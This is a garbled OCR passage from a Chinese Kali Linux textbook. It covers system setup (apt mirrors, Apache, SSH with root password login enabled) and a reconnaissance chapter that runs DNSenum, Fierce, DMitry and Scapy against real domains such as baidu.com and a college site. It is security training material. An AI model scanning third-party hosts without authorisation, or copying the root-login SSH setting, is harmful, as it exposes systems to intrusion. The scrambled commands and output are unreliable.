root@kali:~# mount /dev/cdrom /mnt/cdrom/ # 挂 载 安 装 程序 

mount:/dev/sr0 is write— protected, mounting read— only 

看 到 以 上 的 输出 信息 ,表示 VMwareTools 安装 程序 挂 载 成 功 了 。 

@ 切换 到 挂 载 位 置 ,解压 安装 程序 VMware Tools, 执 行 下 列 命 令 。 

root@kali:~# cd /mnt/cdrom/ # 切 换 目 录 

root@kali:/mnt/cdrom# ls 

manifest. txt VMwareTools — 9.6.2— 1688356. tar. gz vmware — tools — upgrader — 64 

run_upgrader. sh vmware 一 tools 一 Upgrader 一 32 

# 查 看 当前 目录 下 的 文件 

root@kali:/mnt/cdrom# tar zxvf VMwareTools — 9.6.2— 1688356.tar.gz 一 C/ 

# 解 压 VMware Tools 安装 程序 

执行 以 上 命令 后 , VMware Tools 程序 将 被 解压 到 /目录 中 ,并 生成 一 个 名 为 
vmware-tools-distrib 文件 夹 。 

@ 切换 到 VMware Tools 的 目录 ,并 运行 安装 程序 ,执行 下 列 命令 。 

root@kali:/mnt/cdrom# cd /vmware— tools— distrib/ # 切 换 目录 

root@kali:/vmware— tools — distrib# . /vmware— install.pl # 运 行 安装 程序 

执行 以 上 命令 后 ,会 出 现 一 些 问题 ,这 时 不 断 按 Enter 键 ,接受 默认 值 。 

@ 重新 启动 计算 机 。 


242 任务 2: 配置 Kai Linx 软 件 包 源 和 服务 


1. 任务 目标 


通过 配置 Kali Linux 软件 包 源 ,进行 Kali Linux 操作 系统 的 更 新 与 升级 ,能 启动 
Apache 服务 、Secure Shell(SSH) 服 务 和 FTP 服务 ,并 能 够 在 Kali Linux 操作 系统 中 安 
装 中 文 输入 法 。 


2. 工作 任务 


(1) 配置 Kali Linux 软件 包 源 。 
(2) Kali Linux 操作 系统 的 更 新 与 升级 。 
(3) 启动 Apache 服务 。 














项 目 2 黑客 操作 系统 Kali Linux 的 安装 与 设置 

















(4) 启动 Secure Shell(SSH) 服 务 。 
(5) 安装 并 启动 FTP 服务 。 
(6) 安装 中 文 输入 法 。 


3. 工作 环境 
一 台 预 装 Kali Linux 系统 的 主机 。 
4. 实施 过 程 


(1) 配置 Kali Linux 软件 包 源 ,修改 apt-get 外 部 网 络 源 为 较 快 的 源 ,具体 操作 如 下 。 
OO 设置 APT 源 需 要 向 软件 源 文 件 /etc/apt/sources. list 中 添加 映像 网 站 ,执行 下 列 
命令 查找 软件 源 文件 。 


root@kali:~# cd /etc/apt/ 

root@kali:/etc/apt# 1s 

apt. conf.d preferences.d sources.list— trusted. gpg.d 
listchanges.conf sources.list sources.list.d 


@ 若 担心 修改 错误 ,可 以 使 用 下 列 命令 将 软件 源 文 件 进行 备份 ,以 便 能 够 随时 修正 。 


root@kali:/etc/apt# cp sources. list sources. list. bak 
root@kali:/etc/apt# ls 

apt. conf.d preferences.d sources.list— sources. list.d 
listchanges.conf sources.list sources.list.bak trusted.gpg.d 
root@kali:/etc/apt# vim sources. list 


@ 打开 源 文 件 sources. list, 按 i 键 进入 编辑 模式 ,在 窗口 的 左下 角 会 显示 “插入 ”, 说 
明 已 进入 插入 模式 ,运行 编辑 文档 ,输入 以 下 内 容 , 修 改 arp-get 外 部 网 络 源 为 较 快 的 源 ， 
即 添加 以 下 较 快 的 源 。 


#163 源 

deb http://mirrors. 163. com/debian wheezy main non - free contrib 

deb - src http://mirrors.163. com/debian wheezy main non - free contrib 

deb http://mirrors.163. com/debian wheezy — proposed - updates main non - free contrib 

deb - src http://mirrors.163. com/debian wheezy — proposed - updates main non - free contrib 
deb - src http://mirrors.163. com/debian - security wheezy/updates main non - free contrib 
deb http://mirrors. 163. com/debian - security wheezy/updates main non - free contrib 

# 中 科大 Kali 源 

deb http://mirrors. ustc. edu. cn/kali kali main non - free contrib 

deb - src http://mirrors. ustc. edu. cn/kali kali main non - free contrib 

deb http://mirrors. ustc. edu. cn/kali — security kali/updates main contrib non - free 

井 debian_wheezy 源 

deb http://ftp. sjtu. edu. cn/debian wheezy main non - free contrib 

deb - src http://ftp. sjtu. edu. cn/debian wheezy main non - free contrib 

deb http://ftp. sjtu. edu. cn/debian wheezy — proposed - updates main non - free contrib 

deb - src http://ftp. sjtu. edu. cn/debian wheezy — proposed — updates main non - free contrib 
deb http://ftp. sjtu. edu. cn/debian - security wheezy/updates main non - free contrib 

deb - src http://ftp. sjtu. edu. cn/debian - security wheezy/updates main non - free contrib 








| Coo (第 版 ] 


# 官 方 源 

deb http://http. kali. org/kali kali main non - free contrib 

deb - src http://http. kali. org/kali kali main non - free contrib 

deb http://security. kali. org/kali ~ security kali/updates main contrib non - free 


# 新 加 坡 Kali 源 
deb http://mirror. nus. edu. sg/kali/kali/ kali main non - free contrib 


deb - src http://mirror.nus. edu. sg/kali/kali/ kali main non- free contrib 

deb http://security.kali.org/kali- security kali/updates main contrib non - free 

deb http://mirror.nus. edu. sg/kali/kali- security kali/updates main contrib non - free 

deb - src http://mirror. nus. edu. sg/kali/kali — security kali/updates main contrib non - free 


@ 添加 完 以 上 几 个 源 后 , 按 Esc 键 ,窗口 左下 角 的 “插入 ”消失 ,然后 输入 *: wq”, 直 
接 按 Enter 键 保存 刚才 编辑 的 文字 ,此 时 可 以 使 用 cat 命令 查看 source. list 文件 的 内 容 ， 
如 下 所 示 。 


root@kali:/etc/apt# cat sources. list 

deb http://mirrors. 163. com/debian wheezy main non - free contrib 

deb - src http://mirrors. 163. com/debian wheezy main non - free contirb 

deb http://mirrors.163. com/debian wheezy — proposed - updates main non - free contrib 

deb - src http://mirrors. 163. com/debian wheezy — proposed — updates main non - free contrib 
deb - src http://mirrors. 163.com/debian - security wheezy/updates main non - free contrib 


deb http://mirrors.163. com/debian - security wheezy/updates main non - free contrib 


在 该 文件 中 ,添加 的 软件 源 是 根据 不 同 的 软件 库 分 类 的 ,其 中 deb 指 的 是 DEB 包 的 
目录 ; deb-src 指 的 是 源码 目录 。 如 果 不 自己 看 程序 或 编译 ,可 以 不 用 指定 deb-src。 由 于 
deb-src 和 deb 是 成 对 出 现 的 ,可 以 不 指定 deb-src, 但 是 当 需 要 deb-src 的 时 候 ,deb 是 必 
须 指 定 的 。 

回 添加 完 软 件 源 ,需要 更 新 软件 包 列 表 后 才 可 以 使 用 。 执 行 下 列 命令 更 新 软件 包 
列表 。 


root@kali: 一 #apt- get update 


注意 : 更 新 完 软件 列表 后 ,会 自动 退出 程序 。 
(2) Kali Linux 操作 系统 的 更 新 与 升级 ,具体 操作 如 下 。 
@ 使 用 下 列 命令 可 以 升级 系统 。 


root@kali:~# apt— get dist — upgrade 


@ 重启 启动 系统 后 ,登录 到 系统 执行 lsb_release -a 命令 查看 当前 操作 系统 的 所 有 版 
本 信息 ,例如 无 效 的 LSB 模块 ,发行 版 .描述 信息 、 版 本 信息 、 代 号 等 ,执行 下 列 命 令 。 


root@kali:~# lsb release -a 

No LSB modules are available. 
Distributor ID: Kali 

Doscriptlony. EGR 
eee: old 
Codename: Kali— rolling 


























@ 从 输出 的 信息 中 可 以 看 到 当前 系统 版 本 ,如 果 仅 查看 版 本 号 ,可 以 查看 /etc/issue 


文件 ,执行 下 列 命令 。 


root@kali:~# cat /etc/issue 
Kali GNU/Linux Rolling \n \1 


@ 从 输出 的 信息 中 ,可 以 看 出 当前 系统 的 版 本 号 。 
加 使 用 下 列 命令 查看 Kali 内 核 版 本 。 


root@kali:~# uname —r 
4.6.0— kalil ~ amd64 


建议 : Kali 的 更 新 与 升级 可 以 直接 从 官网 下 载 新 的 IOS 文件 进行 安装 。 
(3) 启动 Apache 服务 ,执行 下 列 命令 ,输出 的 信息 表示 Apache 服务 已 经 启动 。 


root@kali:~# service apache2 start 


注意 : 为 了 确认 服务 是 否 正在 运行 ,也 可 以 在 浏览 器 中 访问 本 地 的 地 址 。 如 果 服 务 


器 正在 运行 ,将 显示 如 图 2-31 所 示 的 界面 。 


| Apache2 peban Default .x \ 


Apache2 Debian Default Page: It works - Mozilla Firefox 
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/html/index.html) before continuing to operate your HTTP server. 





图 2-31 Apache 服务 器 访问 窗口 


(4) 启动 Secure Shell(SSH) 服 务 ,具体 操作 如 下 所 示 。 


@ 执行 下 列 命令 ,输出 的 信息 表示 SSH 服务 已 经 启动 。 


root@kali:~# service ssh start 
@ 为 了 确认 服务 的 端口 是 否 被 监听 ,执行 下 列 命令 。 


root@kali:~# netstat — tpan | grep 22 


tcp 0 0 0.0.0.0:22 0.0.0.0: 关 LISTEN 
tcp6 0 
tcp6 0 





G@ Apache2 Debian Default Page 


Thisisthe default welcome page used to test the correct operation of the Apache2 server after 


installation on Debian systems. If you can read this page, it means that the Apache HTTP server 
installed at this site is working properly You should replace this file (located at /var/www 


fyou are a normal user of this web site and don't know what this page is about, this probably means 
that the site is currently unavailable due to maintenance. If the problem persists, please contact the » 
» 






2354/sshd 
2354/sshd 
2294/apache2 
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@ 或 者 执行 下 列 命令 ,效果 也 相同 。 


root@kali:~# netstat ~ antup | grep 22 





tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 2354/sshd 
tcp6 0 : 3 LISTEN 。 2354/sshd 
tcp6 0 2 LISTEN 2294/apache2 





@ 修改 sshd_config 文件 ,执行 下 列 命令 。 
root@kali:~# vim /etc/ssh/sshd_config 
@ 打开 sshd_config 文件 ,把 51 行 的 #PasswordAuthentication yes 前 的 # 删 掉 。 


# Change to no to disable tunnelled clear text passwords 
PasswordAuthentication yes 


@ 在 26 行 的 LoginGraceTime 120 后 添加 PermitRootLogin yes。 


# Authentication: 

LoginGraceTime 120 

PermitRootLogin yes 
PermitRootLogin prohibit — password 


@ 使 用 下 列 命 令 重启 SSH 服务 。 
root@kali:~# service ssh restart 
@ 使 用 下 列 命令 关闭 SSH 服务 ,用 netstat 命令 查看 ,发 现 22 号 端口 已 经 关闭 。 


root@kali:~# service ssh stop 
root@kali:~# netstat -antup | grep 22 
tcp6 0 0 :::80 i LISTEN ~ 2294/apache2 


@ 使 用 下 列 命令 开启 SSH 服务 后 ,发现 22 号 端口 又 已 经 打开 。 


root@kali:~# service ssh start 

root@kali:~# netstat -antup | grep 22 

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 2528/sshd 
tcp6 0 交 和 娄 LISTEN ”2528/sshd 
tcp6 0 LISTEN 2294/apache2 


@@ 也 可 以 使 用 下 列 命令 重启 SSH 服务 。 








root@kali:~# systemctl] restart ssh 
@@ 使 用 下 列 命令 查看 SSH 服务 状态 。 


root@kali:~# /etc/init.d/ssh status 
ssh. service — OpenBSD Secure Shell server 
Loaded: loaded (/1ib/systemd/system/ssh. service; disabled; vendor preset: disabled) 
Active: active (running) since 五 2017—- 04—14 10:46:04 CST; 3min 14s ago 
Main PID: 2656( sshd) 
Tasks: 1 (limit: 9830) 
CGroup: /system. slice/ssh. service 


























L2656 /usr/sbin/sshd -D 

4 月 14 10:46:04 kali systemd[1]: Starting OpenBSD Secure Shell server... 

4 月 14 10:46:04 kali sshd[2656]: Server listening on 0.0.0.0 port 22. 

4 月 14 10:46:04 kali sshd[2656]: Server listening on :: port 22. 

4 月 14 10:46:04 kali systemd[1]: Started OpenBSD Secure Shell server. 

(5) 安装 中 文 输入 法 ,具体 操作 如 下 所 示 。 

Q@ Kali Linux 操作 系统 默认 没有 安装 中 文 输入 法 ,执行 下 列 命令 安装 支持 拼音 和 五 
笔 输 入 的 小 企鹅 中 文 输入 法 。 


root@kali:~# apt— get install fcitx— table— wbpy ttf - wqy— microhei ttf - wqy— zenhei 
@ 也 可 以 选择 以 下 任意 一 种 进行 中 文 输入 法 的 安装 。 


# 典 型 的 ibus 

root@kali:~# apt— get install ibus ibus— pinyin 

# fcitx 拼音 ,推荐 使 用 

root@kali:~# apt- get install fcitx fcitx— googlepinyin fcitx- pinyin 
fcitx— module — cloudpinyin 


输入 法 安装 完成 后 需要 注销 当前 用 户 重新 登录 之 后 才能 使 用 。 


2.5 常见 问题 解答 


Kali Linux 如 何 配置 IP 地 址 ? 
答 : 配置 IP 方式 有 两 种 ,第 一 种 方式 是 通过 命令 直接 配置 。 
(1) 使 用 下 列 命令 配置 IP 地 址 为 192. 168. 72. 128 。 


root@kali:~# ifconfig etho:1 192.168.72.128 
(2) 使 用 下 列 命令 配置 默认 网 关 为 192. 168. 72. 1。 


root@kali:~# route add default gw 192.168.72.1 


(3) 使 用 vi 命令 修改 /etc/resolv. conf 配置 文件 ,添加 nameserver DNS 来 配置 DNS 
服务 器 地 址 ,但 是 该 方式 只 能 临时 修改 IP 地 址 , 当 服 务 器 重启 后 ,配置 信息 丢失 。 

第 二 种 方式 是 直接 修改 配置 文件 。 

(1) 使 用 vim 命令 编辑 配置 文件 /etc/network/interface。 


root@kali:~# vim /etc/network/interface 
(2) 使 用 下 面 的 行 来 蔡 换 有 关 eth0 的 行 。 


# The primary network interface 
auto eth0 

iface eth0 inet static 

address 192.168.72.128 

gateway 192.168.72.1 

netmask 255.255.255.0 
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(3) 保存 配置 后 ,使 用 下 列 命令 重启 网 卡 ,使 配置 生效 。 

root@kali:~# vim /etc/init.d/networking restart 

(4) 配置 DNS 的 具体 方式 是 ,首先 使 用 下 列 命令 打开 配置 文件 进行 编辑 。 
root@kali:~# vi /etc/resolv. conf 

(5) 在 文件 中 添加 下 列 内 容 。 


search chotim. com 
nameserver 8.8.8.8 


(6) 使 用 下 列 命令 重启 网 卡 服务 。 


root@kali:~# /etc/init.d/networking restart 


2.6 认证 试题 


选择 题 

1. Kali Linux 的 默认 用 户 名 是 ( Ws 
A. administrator B. anonymous 
C. root D. user 


2. Kali Linux 在 添加 完 软件 源 之 后 ,需要 更 新 软件 包 列 表 后 才能 使 用 ,更 新 软件 包 
列表 执行 如 下 命令 ( ) 攻 击 手段 。 
A. apt-get update B. apt-get install 
C. apt update D. apt install 


ro 


3.1 用 户 需 求 与 分 析 


黑客 为 了 发 动 攻击 需要 收集 关于 目标 主机 的 基本 信息 ,黑客 得 到 的 信息 越 多 ,攻击 成 
功 的 概率 也 就 越 高 。Kali Linux 操作 系统 上 提供 了 很 多 工具 ,可 以 协助 整理 和 组 织 目标 
主机 的 数据 。 


3.2 预备 知识 


321 枚 举 服务 


枚 举 是 一 类 程序 , 它 允 许 用 户 从 一 个 网 络 中 收集 某 一 类 的 所 有 相关 信息 。DNS 枚 举 
可 以 收集 本 地 所 有 DNS 服务 和 相关 条 目 , 可 以 帮助 黑客 收集 目标 组 织 的 关键 信息 ,如 用 
户 名 、 计 算 机 名 和 IP 地 址 等 ,为 了 获得 这 些 信 息 ,黑客 可 以 使 用 DNSenum 工具 。 


1. DNS 枚 举 工具 DNSenum 


DNSenum 是 一 款 非常 强大 的 域名 信息 收集 工具 , 它 能 够 通过 谷歌 或 者 字典 文件 猜 
测 可 能 存在 的 域名 ,并 对 一 个 网 段 进行 反 向 查询 。 它 不 仅 可 以 查询 网 站 的 主机 地 址 信息 、 
域名 服务 器 和 邮件 交换 记录 ,还 可 以 在 域名 服务 器 上 执行 AXFR 请 求 ,然后 通过 谷歌 脚 
本 得 到 扩展 域名 信息 ,提取 子 域名 并 查询 ,最 后 计算 C 类 地 址 并 执行 WHOIS 查询 ,执行 
反 向 查询 ,把 地 址 段 写 入 文件 。 


2. DNS 枚 举 工具 Fierce 


Fierce 工具 和 DNSenum 工具 性 质 差不多 ,主要 是 对 子 域名 进行 扫描 和 收集 信息 的 。 
使 用 Fierce 工具 获取 一 个 目标 主机 上 所 有 IP 地 址 和 主机 信息 。 


3 2 2 测试 网 络 范围 
测量 网 络 范围 内 的 IP 地 址 或 域名 也 是 黑客 信息 收集 的 重要 组 成 部 分 ,通过 测量 网 络 
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范围 内 的 IP 地 址 或 域名 ,可 以 确定 是 否 存在 人 侵 网 络 并 损害 系统 。 通 常情 况 下 ,黑客 只 
要 在 一 个 领域 找到 漏洞 就 可 以 利用 这 个 漏洞 攻击 另外 一 个 领域 。 在 Kali 中 提供 了 
DMitry 和 Scapy 工具 ,其 中 DMitry 工具 用 来 查询 目标 网 络 中 IP 地 址 或 域名 信息 ,而 
Scapy 工具 用 来 扫描 网 络 及 嗅 探 数据 包 。 





1. 域名 查询 工具 DMitry 


DMitry 工具 是 用 来 查询 IP 或 域名 WHOIS 信息 的 ,WHOIS 是 用 来 查询 域名 是 否 已 
经 被 注册 及 注册 域名 详细 信息 的 数据 库 , 例 如 域名 所 有 人 和 域名 注册 商 。 使 用 该 工具 可 
以 查 到 域名 的 注册 商 和 过 期 时 间 等 。 

虽然 使 用 DMitry 工具 可 以 查 到 IP 或 域名 信息 ,但 还 是 不 能 判断 出 网 络 范围 ,因为 
一 般 的 路 由 器 和 防火 墙 并 不 支持 IP 地 址 范围 的 方式 ,所 以 现实 中 经 常 要 把 IP 地 址 转换 
成 子 网 掩 码 的 格式 .CIDR 格式 和 思科 反 向 子 网 掩 码 格式 等 。 在 Linux 中 ,Netmask 工具 
可 以 在 IP 范围. 子 网 掩 码 .CIDR 和 Cisco 等 格式 中 互相 转换 ,并 且 提 供 了 IP 地 址 的 点 分 
十 进 制 、 二 进 制 . 八 进 制 和 十 六 进 制 之 间 的 相互 转换 。 


2. 路 由 跟踪 工具 Scapy 


Scapy 是 一 款 功能 强大 的 交互 式 数据 包 处 理工 具 、 数 据 包 生成 器 、 网 络 扫 描 器 、 网 络 
发 现 工 具 和 包 嗅 探 工 具 。 它 提供 多 种 类 别 的 交互 式 生 成 数据 包 或 数据 包 集合 ,对 数据 包 
进行 操作 发送 数据 包 、 包 嗅 探 、 应 答 和 反馈 匹配 等 功能 。 


323 系统 指纹 识别 和 服务 指纹 识别 


现在 一 些 便携 式 计算 机 操作 系统 使 用 指纹 识别 来 验证 密码 进行 登录 ,例如 苹果 手机 。 
指纹 识别 是 识别 系统 的 一 个 典型 模式 ,包括 指纹 图 形 获取 、 处 理 、 特 征 提取 和 对 等 模块 。 
目标 系统 中 服务 的 指纹 信息 包括 服务 端口 .服务 名 和 版 本 等 ,在 Kali 中 可 以 使 用 Nmap 
和 Amap 工具 识别 指纹 信息 。 使 用 Nmap 工具 可 以 查看 目标 主机 正在 运行 的 端口 号 ,还 
可 以 获取 各 个 端口 对 应 的 服务 及 版 本 信息 。 服 务 枚 举 工 具 Amap 能 够 识别 正 运 行 在 一 个 
指定 端口 或 一 个 范围 端口 上 的 应 用 程序 。 


324 网 络 映射 器 Nrep 简 介 


Nmap 号 称 “ 扫 描 之 王 ”, 提 供 了 大 量 基于 DOS 命令 行 的 选项 。 它 是 一 个 免费 开放 的 
网 络 扫 描 和 嗅 探 工具 ,也 叫 作 网 络 映 射 器 (Network Mapper)。 该 工具 有 3 个 基本 功能 : 
外 探测 一 组 主机 是 否 在 线 ; @ 扫 描 主 机 端口 , 嗅 探 所 提供 的 网 络 服务 ; @ 可 以 推断 主机 所 用 
的 操作 系统 。 通 常 ,网 络 管理 员 利用 Nmap 来 进行 网 络 系统 安全 的 评估 ,而 黑客 可 以 使 用 该 
软件 扫描 ,通过 向 远程 主机 发 送 探测 数据 包 来 获取 主机 的 响应 ,并 根据 主机 的 端口 开放 情况 
得 到 网 络 的 安全 状态 ,从 中 寻找 存在 漏洞 的 目标 主机 ,从 而 实施 下 一 步 的 攻击 。 

Nmap 使 用 TCP/IP 协议 栈 指纹 准确 地 判断 目标 主机 的 操作 系统 类 型 。 首 先 , Nmap 
通过 对 目标 主机 进行 端口 扫描 , 找 出 有 哪些 端口 正在 目标 主机 上 监听 。 当 侦 测 到 目标 主 
机 有 多 于 一 个 开放 的 TCP 端口 一 个 关闭 的 TCP 端口 和 一 个 关闭 的 UDP 端口 时 , Nmap 











| | 项目 3 利用 Kati Linux 收 集 及 利用 信息 < 


的 探测 能 力 是 最 好 的 。 其 次 ,Nmap 对 目标 主机 进行 一 系列 测试 ,利用 得 出 的 测试 结果 建 
立 响 应 目标 主机 的 Nmap 指纹 。 最 后 ,将 此 Nmap 指纹 与 指纹 库 中 的 指纹 进行 查找 匹配 ， 
从 而 得 出 操作 系统 的 类 型 。Nmap 支持 4 种 扫描 方式 : ping 扫描 、TCP connect() 扫 描 、 
TCP SYN 扫描 ,UDP 扫描 。 该 工具 既 有 Windows 版 本 也 有 Linux 版 本 ,可 以 在 http:// 
Www. insecure. org/nmap 上 免费 下 载 ,下 载 后 直接 运行 进行 安装 即 可 。 


3.3 方案 设计 


方案 设计 如 表 3-1 所 示 。 
表 3-1 方案 设计 

任务 名 称 利用 Kali Linux 收集 及 利用 信息 
. 利用 枚 举 工具 收集 关键 信息 
. 利用 域名 查询 工具 测量 网 络 范围 
. 利用 路 由 跟踪 工具 测量 网 络 范围 
. 使 用 工具 进行 系统 指纹 识别 
. 使 用 工具 进行 服务 指纹 识别 
. 使 用 DNS 枚 举 工具 收集 目标 主机 的 关键 信息 
. 利用 域名 查询 工具 查询 目标 网 络 中 IP 地 址 或 域名 信息 
.能 利用 路 由 跟踪 工具 来 扫描 网 络 及 嗅 探 数据 包 
. 能 使 用 Nmap 工具 识别 正在 运行 的 目标 主机 的 系统 指纹 信息 
.能 使 用 Amap 工具 识别 正在 运行 的 目标 主机 的 服务 指纹 信息 
.了解 枚 举 服务 的 定义 
. 熟悉 DNS 枚 举 工具 
. 熟悉 域名 查询 工具 和 路 由 跟踪 工具 
.了解 系统 指纹 识别 和 服务 指纹 识别 的 概念 
. 了解 网 络 映 射 器 Nmap 工具 
. 培养 良好 的 职业 道德 
. 树立 较 强 的 安全 意识 
. 掌握 网 络 安全 行业 的 基本 情况 
. 树立 较 强 的 安全 ,节约 ,环保 意识 
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能 力 目标 





知识 目标 





素质 目标 
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3.4 项 目 实 施 
341 任务 1 利用 枚 举 工具 收集 关键 信息 


1. 任务 目标 
使 用 DNS 枚 举 工具 收集 目标 主机 的 关键 信息 ,如 用 户 名 ,计算机 名 和 IP 地 址 等 。 
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2. 工作 任务 





(1) DNS 枚 举 工 具 DNSenum 的 使 用 。 
(2) DNS 枚 举 工具 Fierce 的 使 用 。 





3. 工作 环境 


- 台 预 装 Kali Linux 系统 的 主机 。 


4. 实施 过 程 


党 


(1) DNS 枚 举 工具 DNSenum 的 使 用 。 
中 在 终端 执行 如 图 3-1 所 示 的 命令 ,输出 信息 显示 了 DNS 服务 的 详细 信息 ,其 中 包 
括 顺德 职业 技术 学 院 Web 服务 器 的 IP 地 址 、 域名 服 务 地 址 。 


# dnsenum --enum www.sdpt.com.cn 
dnsenum.pl VERSION:1s253 
Warning: can't load Net::WhoisssIP module, whois queries disabled. 


dptcon. cn 


www.sdpt .com.cn. 218.13.33.168 





图 3-1 显示 服务 的 详细 信息 





@ 在 终端 执行 如 图 3-2 所 示 的 命令 ,输出 信息 显示 了 DNS 服务 的 详细 信息 ,其 中 包 
括 百度 网 站 Web 服务 器 的 IP 地 址 ,域名 服务 地 址 。 
# dnsenum --enum wwwsbaidu.com 


dnsenum.pl VERSION:1.2:3 
Warning: can't load Net: :Whois::IP module, whois queries disabled. 


www. baidu .com. 111.13.166.92 
www .baidu.com. 111.13.166.91 





zkuuywhestbd .www. baidu.com 221.179.46.194 


图 3-2 查看 百度 Web 服务 器 的 详细 信息 


@ 使 用 DNSenum 工具 检查 DNS 枚 举 时 ,还 可 以 使 用 dnsenum 命令 的 一 些 附加 选 
项 ,如 使 用 --threads [number] 设 置 用户 同 时 运行 多 个 进程 数 ; 使 用 -r 允许 用 户 启用 递归 
查询 ; 使 用 -d 允许 用 户 设置 WHOIS 请 求 之 间 时 间 延 迟 数 (单位 为 秒 ); 使 用 -O 允许 用 户 
指定 输出 位 置 ; 使 用 -w 允许 用 户 启用 WHOIS 请 求 。 
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(2) DNS 枚 举 工 具 Fierce 的 使 用 。 
@ 在 终端 执行 如 图 3-3 所 示 的 命令 。 
@ 输出 信息 显示 了 baidu. com 下 所 有 的 子 域 ,如 图 3-4 所 示 。 


Checking for wildcard DNS. . . 
* Found 99136368221.baidu.com at 221.179.46.194. 
* High probability of wildcard DNS . 

Now performing 2289 test(s)... 

16.94.49.39 access.baidu,com 

16.11.252.74 accounts.baidu.com 

19.26.199.19 admin.baidu.com 


:~# fierce -dns baidu.com 上 ads.baidu.com 
for baidu.com: agent.baidu.com 

s3.baidu.com 172.22.15.16 agent.baidu.com 
.baidu.com 16.57.29.13 apollo.baidu.com 
:baidu.com . asm.baidu.com 
:baidu.com 5 . at.baidu.com 
baidu.com 。 . athena.baidu.com 





图 3-3 Fierce 工具 的 使 用 图 3-4 baidu. com 下 所 有 的 子 域 


342 任务 2: 利用 域名 查询 工具 和 路 由 跟踪 工具 测量 网 络 范围 








1. 任务 目标 
利用 域名 查询 工具 查询 目标 网 络 中 IP 地 址 或 域名 信息 ,利用 路 由 跟踪 工具 来 扫描 网 


络 及 嗅 探 数 据 包 。 
2. 工作 任务 


(1) 域名 查询 工具 DMitry 的 使 用 
(2) 路 由 跟踪 工具 Scapy 的 使 用 。 


3. 工作 环境 
- 台 预 装 Kali Linux 系统 的 主机 。 
4. 实施 过 程 


(1) 域名 查询 工具 DMitry 的 使 用 。 

OO 查看 DMitry 工具 的 帮助 信息 ,如 图 3-5 所 示 。 信 息 显 示 了 dmitry 命令 的 语法 格 
式 和 所 有 可 用 参数 。 

2) 使 用 DMitry 工具 收集 sdpt. com. cn 域名 的 信息 ,如 图 3-6 所 示 。 

@ 以 上 输出 信息 显示 了 sdpt. com. cn 域名 的 IP 地 址 、WHOIS 信息 及 开放 的 端 
口号 。 

@ 使 用 dmitry 命令 的 -s 选项 ,可 以 查询 可 能 的 子 域 .如 图 3-7 所 示 。 从 输出 的 信息 
中 ,可 以 看 到 搜索 到 了 一 个 子 域 .该 子 域名 为 Google. com,IP 地 址 为 111. 13. 101. 208。 
由 于 不 能 连接 Google. com 网 站 ,因此 出 现 Unable to connect:Socket Connect Error 错 


误 信息 。 








:~# dmitry -h 
Deepmagic Information Gathering Tool 
"There be some deep magic going on” 


ldmitry: invalid option -- ‘h’ 
Usage: dmitry [-winsepfb] [-t 6-9] [-o %host.txt] host 


Save output to %host.txt or to file specified by -0 file 

Perform a whois lookup on the IP address of a host 

Perform a whois lookup on the domain name of a host 

Retrieve Netcraft.com information on a host 

Perform a search for possible subdomains 

Perform a search for possible email addresses 

Perform a TCP port scan on a host 
. Perform a TCP port scan on a host showing output reporting filtered ports 
| Read in the banner received from the scanned port 
+* 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 ) 
* -p flagged to be passed 





图 3-5 DMitry 工具 的 帮助 信息 


t :~# dmitry -wnpb sdpt.com.cn 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:218.13.33.168 
lHostName: sdpt .com.cn 


IGathered Inic-whois information for sdpt.com.cn 


Error: Unabte to connect - Invalid Host 
ERROR: Connection to InicWhois Server cn.whois-serversvnet failLed 


Gathered Netcraft information for sdpt.com.cn 


lIRetrieving Netcraft.com information for sdpt.com.cn 
INetcraft.com Information gathered 


Po State 
lI88@/tcp open 


Portscan Finished: Scanned 156 ports, 69 ports were in state closed 


IAll scans completed, exiting 





图 3-6 ”sdpt. com. cn 域名 的 信息 


t li:~# dmitry -s baidu.com 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:111.13.161.298 
HostName:baidu.com 


cathered Subdomain information for baidu.com 


Searching Google.com:80... 
Unable to connect: Socket Connect Error 





图 3-7 查询 合理 的 子 域 


















































@ 用 netmask 命令 将 域名 sdpt. com. cn 转换 成 标准 的 子 网 掩 码 格式 ,如 图 3-8 
所 示 。 


:~# netmask -s sdpt.com.cn 





218.13.33.168/255.255.255.255 
图 3-8 将 域名 转换 为 子 网 掩 码 格式 
(2) 路 由 跟踪 工具 Scapy 的 使 用 。 
OO 启动 Scapy 工具 ,如 图 3-9 所 示 。 


pe ET 
INF0: Can't import python “gnuplot wrapper . Won't be able to plot. 
IWARNING: No route found for IPv6é destination :: (no default route?) 


Welcome to Scapy (2.3.2) 





3-9 启动 Scapy 工具 


@ 使 用 srO 〇 函数 实现 发 送 和 接收 数据 包 , 执 行 命令 如 下 所 示 ,执行 以 上 命令 后 ,会 自 
动 与 www. sdpt. com. cn 建立 连接 ,执行 几 分 钟 后 ,使 用 Ctrl 十 C 组 合 键 终止 接收 数据 
包 , 如 图 3-10 所 示 。 从 输出 的 信息 中 可 以 看 到 收 到 25 个 数据 包 , 得 到 11 个 响应 包 及 保 
留 了 13 个 包 。 


ans,unans=sr(IP(dst="www.baidu.com/39",ttL=(1,6))/TCP()) 
Begin emission: 


***Finished to send 24 packets. 
Received 25 packets, got 11 answers, rémaining 13 packets 





图 3-10 使 用 sr() 函 数 发 送 和 接收 数据 包 


@ 以 表 的 形式 查看 数据 包 的 发 送 情况 ,如 图 3-11 所 示 ,输出 的 信息 显示 了 该 网 络 中 
的 所 有 IP 地 址 。 
EDFHEITE ET 


111.13.166.88 111.13.190.89 111.13.100.90 111.13.1696.91 
1 192.168.232.2 192.168.232.2 192.168.232.2 192.168.232.2 


111.13.199.89 111.13.199.98 111.13.196.91 
111.13.160.89 111.13.196.968 111.13.190.91 
111.13.196.89 - 





图 3-11 以 表 的 形式 查看 数据 包 的 发 送 情况 


@ 使 用 scapy 命令 查看 TCP 路 由 跟踪 信息 ,如 图 3-12 所 示 。 输 出 信息 显示 了 与 
www. baidu. com www. kali. org、www. sdpt. com. cn 三 个 网 站 连接 后 所 经 过 的 地 址 。 

res, unans = traceroute(["www. baidu. com"，"www. kali. org","www. sdpt. com. cn"], dport = [80, 

443],maxtt1 = 20,retry= — 2) 

输出 信息 中 ,RA 标识 路 由 区 .SA 表示 服务 区 。 其 中 路 由 区 是 指 当 前 系统 中 移动 台 
当前 的 位 置 ,RA 的 标识 符 是 RAI.RA 是 包含 在 LA 内 的 。 服 务 区 是 指 移动 台 可 获得 服 
